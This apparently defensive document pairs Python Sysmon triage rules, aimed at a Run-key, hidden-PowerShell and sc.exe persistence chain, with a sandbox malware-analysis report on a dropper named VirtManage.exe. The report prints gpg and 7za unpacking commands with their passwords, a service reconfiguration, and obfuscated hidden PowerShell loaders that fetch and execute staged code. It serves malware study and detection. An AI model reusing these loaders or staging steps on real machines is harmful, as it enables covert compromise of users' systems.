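"""Triage rules for the persistence chain recorded in this report.
Added example; SAMPLE_EVENTS are constructed in Sysmon field names and are
not sandbox output (the Run value data is assumed, the report shows only
the value name)."""
import re

RUN_VALUE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\\[^\\]+$", re.I)
PROGRAMDATA = re.compile(r"^C:\\ProgramData\\", re.I)
HIDDEN_PS = re.compile(r"-w\w*\s+hidden", re.I)        # -windowstyle Hidden, -w hidden
SC_CONFIG = re.compile(r"\bconfig\b.*\bstart=\s*\w+", re.I)


def rule_run_value_into_programdata(ev):
    """Run value whose data points at a binary under C:\\ProgramData."""
    return bool(ev.get("EventID") == 13
                and RUN_VALUE.search(ev.get("TargetObject", ""))
                and PROGRAMDATA.search(ev.get("Details", "")))


def rule_hidden_powershell_from_programdata(ev):
    """Hidden-window PowerShell whose parent lives under C:\\ProgramData."""
    return bool(ev.get("EventID") == 1
                and ev.get("Image", "").lower().endswith("\\powershell.exe")
                and PROGRAMDATA.search(ev.get("ParentImage", ""))
                and HIDDEN_PS.search(ev.get("CommandLine", "")))


def rule_sc_start_type_from_user_binary(ev):
    """sc.exe changing a service start type, launched from outside C:\\Windows."""
    return bool(ev.get("EventID") == 1
                and ev.get("Image", "").lower().endswith("\\sc.exe")
                and SC_CONFIG.search(ev.get("CommandLine", ""))
                and not ev.get("ParentImage", "").lower().startswith("c:\\windows\\"))


RULES = [rule_run_value_into_programdata,
         rule_hidden_powershell_from_programdata,
         rule_sc_start_type_from_user_binary]


def triage(events):
    """Return (rule name, event) for every rule that fires on every event."""
    return [(r.__name__, ev) for ev in events for r in RULES if r(ev)]


# Constructed events modelled on the report rows (paths and value name are
# from the report; Details for the Run value is assumed).
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Users\user\Desktop\VirtManage.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateOleview",
     "Details": r"C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe",
     "CommandLine": "powershell.exe -windowstyle Hidden -command \"SI Variable:zX 'Net.WebClient';...\""},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\sc.exe",
     "ParentImage": r"C:\Users\user\Desktop\VirtManage.exe",
     "CommandLine": "sc config msdtc start= demand"},
    # Benign controls: interactive PowerShell from Explorer, vendor tray Run value.
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "Details": r"C:\Program Files\Vendor\tray.exe"},
]

if __name__ == "__main__":
    for name, ev in triage(SAMPLE_EVENTS):
        print(name, "->", ev.get("Image"))
```

The third rule deliberately ignores `sc.exe` launched from anything under `C:\Windows\`, which keeps servicing and setup tasks quiet but also means a dropper that first copies itself into a Windows subdirectory would not trigger it; widen the parent check, or key on the service name, if that trade-off is wrong for the environment. The `Run`-value rule keys on the data pointing into `C:\ProgramData` rather than on the value name, since `UpdateOleview` is trivially changed between builds.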

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\VirtManage.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: 23.2.powershell.exe.1e94d1aa5e8.0.raw.unpack, QXswUGRbaw.cs .Net Code: string.Format("{0} {1}\\{2}", Environment.GetEnvironmentVariable("COMPUTERNAME"), Environment.GetEnvironmentVariable("USERDOMAIN"), Environment.GetEnvironmentVariable("USERNAME"))
Source: 23.2.powershell.exe.1e9651d0000.1.raw.unpack, QXswUGRbaw.cs .Net Code: string.Format("{0} {1}\\{2}", Environment.GetEnvironmentVariable("COMPUTERNAME"), Environment.GetEnvironmentVariable("USERDOMAIN"), Environment.GetEnvironmentVariable("USERNAME"))
Source: 27.2.powershell.exe.234d5410000.1.raw.unpack, wxtjRIBKug.cs .Net Code: string.Format("{0} {1}\\{2}", Environment.GetEnvironmentVariable("COMPUTERNAME"), Environment.GetEnvironmentVariable("USERDOMAIN"), Environment.GetEnvironmentVariable("USERNAME"))
Source: 27.2.powershell.exe.234bd8a0dd8.0.raw.unpack, wxtjRIBKug.cs .Net Code: string.Format("{0} {1}\\{2}", Environment.GetEnvironmentVariable("COMPUTERNAME"), Environment.GetEnvironmentVariable("USERDOMAIN"), Environment.GetEnvironmentVariable("USERNAME"))
Source: 2s4bn4bw.dll.36.dr, QXswUGRbaw.cs .Net Code: string.Format("{0} {1}\\{2}", Environment.GetEnvironmentVariable("COMPUTERNAME"), Environment.GetEnvironmentVariable("USERDOMAIN"), Environment.GetEnvironmentVariable("USERNAME"))
Source: e3jseyke.dll.39.dr, wxtjRIBKug.cs .Net Code: string.Format("{0} {1}\\{2}", Environment.GetEnvironmentVariable("COMPUTERNAME"), Environment.GetEnvironmentVariable("USERDOMAIN"), Environment.GetEnvironmentVariable("USERNAME"))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\VirtManage.exe Window / User API: threadDelayed 8052
Source: C:\Users\user\Desktop\VirtManage.exe Window / User API: threadDelayed 1884
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5442
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4347
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4983
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4742
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\e3jseyke.dll
Source: C:\Users\user\Desktop\VirtManage.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\MicrosoftAPI\gpg-agent.exe
Source: C:\Windows\SysWOW64\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2C66.tmp
Source: C:\Users\user\Desktop\VirtManage.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrFD0A.tmp\nsExec.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.dll
Source: C:\Windows\SysWOW64\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2CE4.tmp
Source: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\MicrosoftAPI\aclui-2.dll
Source: C:\Users\user\Desktop\VirtManage.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrFD0A.tmp\nsis7z.dll
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\MicrosoftAPI\7za.dll
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe API coverage: 0.2 %
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe API coverage: 0.2 %
Source: C:\Users\user\Desktop\VirtManage.exe TID: 6796 Thread sleep time: -805200s >= -30000s
Source: C:\Users\user\Desktop\VirtManage.exe TID: 6796 Thread sleep time: -188400s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068 Thread sleep count: 5442 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068 Thread sleep count: 4347 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7120 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5484 Thread sleep count: 4983 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5484 Thread sleep count: 4742 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1988 Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6964 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1468 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\VirtManage.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\VirtManage.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\VirtManage.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\VirtManage.exe Code function: 0_2_004068D4 FindFirstFileW,FindClose,0_2_004068D4
Source: C:\Users\user\Desktop\VirtManage.exe Code function: 0_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C83
Source: C:\Users\user\Desktop\VirtManage.exe Code function: 0_2_00402930 FindFirstFileW,0_2_00402930
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe Code function: 1_2_004CC650 strpbrk,FindFirstFileW,gcry_free,strlen,gcry_malloc,gcry_free,FindNextFileW,FindClose,gcry_free,FindClose,gcry_free,FindClose,1_2_004CC650
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe Code function: 3_2_004CC650 strpbrk,FindFirstFileW,gcry_free,strlen,gcry_malloc,gcry_free,FindNextFileW,FindClose,gcry_free,FindClose,gcry_free,FindClose,3_2_004CC650
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tEventVmNetworkAdapter',
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD54A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapterX
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD54A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
Source: powershell.exe, 00000017.00000002.3429436966.000001E9649E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4D
Source: svchost.exe, 0000001D.00000002.2858401580.0000018B7E02B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP}e
Source: 7za.exe, 00000007.00000003.965422387.000001FFA43E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 968B3FD3385208B479FE43CC__F5E8C90CE968B3FD3385208B479FE43CVMware.Binding.WsTrust1.0.0.0{4B1FEDDD-E8BD-8A4B-41BF-2D55E4FD9D86}VMWARE~1.DLL|VMware.Binding.WsTrust.dll_FD9BA260F6E682E262FA42F3C05C6925C__FD9BA260F6E682E262FA42F3C05C6925log4net669E0DDF0BB1AA2A2.0.15.0{2FA634FE-D1FF-771A-58EB-507FF9A0FFBB}LOG4NET.DLL|log4net.dllSourceDir[ProgramFilesFolder][Manufacturer]\[ProductName]DIRCA_TARGETDIRTARGETDIR=""{6DD554EC-2D48-B234-25FF-6CF5942A837D}C__70867F2D6BE94247A3BF24C2A1A54D81.:USER'S~1|User's Programs Menu
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapterX
Source: powershell.exe, 0000001B.00000002.3417917924.00000234D5210000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2858959230.0000018B7F654000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: VirtManage.exe, 00000000.00000003.1061441141.0000000004890000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Add-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Get-NetEventVmNetworkAdapter',
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD54A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
Source: gpg.exe, 00000001.00000002.915312776.0000000000898000.00000004.00000020.00020000.00000000.sdmp, gpg.exe, 00000003.00000002.920106814.0000000000947000.00000004.00000020.00020000.00000000.sdmp, gpg.exe, 00000005.00000002.930967037.0000000000818000.00000004.00000020.00020000.00000000.sdmp, gpg.exe, 0000000A.00000002.991917473.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, gpg.exe, 0000000C.00000002.997460558.00000000007A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\VirtManage.exe API call chain: ExitProcess graph end node graph_0-3893
Source: C:\Users\user\Desktop\VirtManage.exe API call chain: ExitProcess graph end node graph_0-3742
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe Code function: 1_2_004014F0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004014F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe Process token adjusted: Debug
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe Code function: 1_2_00401170 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,_cexit,exit,1_2_00401170
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe Code function: 1_2_004011B3 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,1_2_004011B3
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe Code function: 3_2_00401170 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,_cexit,exit,3_2_00401170
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe Code function: 3_2_004011B3 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,3_2_004011B3
Source: C:\Users\user\Desktop\VirtManage.exe Process created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\5FILE.1A.gpg
Source: C:\Users\user\Desktop\VirtManage.exe Process created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.dll --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\1FILE.1A.gpg
Source: C:\Users\user\Desktop\VirtManage.exe Process created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\2FILE.1A.gpg
Source: C:\Users\user\Desktop\VirtManage.exe Process created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI
Source: C:\Users\user\Desktop\VirtManage.exe Process created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\Cert.txt --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\3FILE.1A.gpg
Source: C:\Users\user\Desktop\VirtManage.exe Process created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\4FILE.1A.gpg
Source: C:\Users\user\Desktop\VirtManage.exe Process created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI
Source: C:\Users\user\Desktop\VirtManage.exe Process created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\2FILE.1A.gpg
Source: C:\Users\user\Desktop\VirtManage.exe Process created: C:\Windows\SysWOW64\sc.exe sc config msdtc obj= "LocalSystem"
Source: C:\Users\user\Desktop\VirtManage.exe Process created: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e3jseyke.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D22.tmp" "c:\Users\user\AppData\Local\Temp\2s4bn4bw\CSC355371FC2ED34AC6B0D2C6DC18B9358D.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6B4F.tmp" "c:\Users\user\AppData\Local\Temp\CSCC2520B897D0D4F99AF1935CDE7767C35.TMP"
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "sv 5pw $('c:\progr'+'amdata\micr'+'osoft\micro'+'softapi\ieq'+'u4aed'+'3u.t');set-item variable:\sh 'net.webclient';dir rid*;set-variable 7 (.(item variable:\*uti*t).value.(((item variable:\*uti*t).value|gm)[6].name).(((item variable:\*uti*t).value.(((item variable:\*uti*t).value|gm)[6].name)|gm|where-object{(variable _ -valueo).name-clike'*dl*t'}).name).invoke((item variable:\*uti*t).value.(((item variable:\*uti*t).value|gm)[6].name).(((item variable:\*uti*t).value.(((item variable:\*uti*t).value|gm)[6].name).psobject.methods|where-object{(variable _ -valueo).name-clike'*nd*e'}).name).invoke('n*ct',1,$true))(gv sh).value);set-variable gpw ((((variable 7).value|gm)|where-object{(variable _ -valueo).name-clike'd*g'}).name);.(get-command *e-*press*)((variable 7).value.((gci variable:/gpw).value).invoke((gv 5pw -valueo)))"
Source: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "si variable:zx 'net.webclient';set-variable g8e $('c:\pro'+'gramdat'+'a\micro'+'soft\update'+'desktop\eep6d'+'i0ugu.t');dir rid*;set-variable kal (.$executioncontext.invokecommand.(($executioncontext.invokecommand.psobject.methods|where-object{(get-item variable:/_).value.name-ilike'g*d'}).name).invoke($executioncontext.invokecommand.getcommandname('n*-o*',1,1),[system.management.automation.commandtypes]::cmdlet)(gi variable:\zx).value);set-item variable:/75 ((((dir variable:\kal).value|member)|where-object{(get-item variable:/_).value.name-ilike'd*g'}).name);$executioncontext|foreach{(get-item variable:/_).value.invokecommand.(($executioncontext.invokecommand|member|where-object{(get-item variable:/_).value.name-ilike'*ke*pt'}).name).invoke((dir variable:\kal).value.((gv 75 -va)).invoke((childitem variable:/g8e).value))}"
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "sv 5pw $('c:\progr'+'amdata\micr'+'osoft\micro'+'softapi\ieq'+'u4aed'+'3u.t');set-item variable:\sh 'net.webclient';dir rid*;set-variable 7 (.(item variable:\*uti*t).value.(((item variable:\*uti*t).value|gm)[6].name).(((item variable:\*uti*t).value.(((item variable:\*uti*t).value|gm)[6].name)|gm|where-object{(variable _ -valueo).name-clike'*dl*t'}).name).invoke((item variable:\*uti*t).value.(((item variable:\*uti*t).value|gm)[6].name).(((item variable:\*uti*t).value.(((item variable:\*uti*t).value|gm)[6].name).psobject.methods|where-object{(variable _ -valueo).name-clike'*nd*e'}).name).invoke('n*ct',1,$true))(gv sh).value);set-variable gpw ((((variable 7).value|gm)|where-object{(variable _ -valueo).name-clike'd*g'}).name);.(get-command *e-*press*)((variable 7).value.((gci variable:/gpw).value).invoke((gv 5pw -valueo)))"
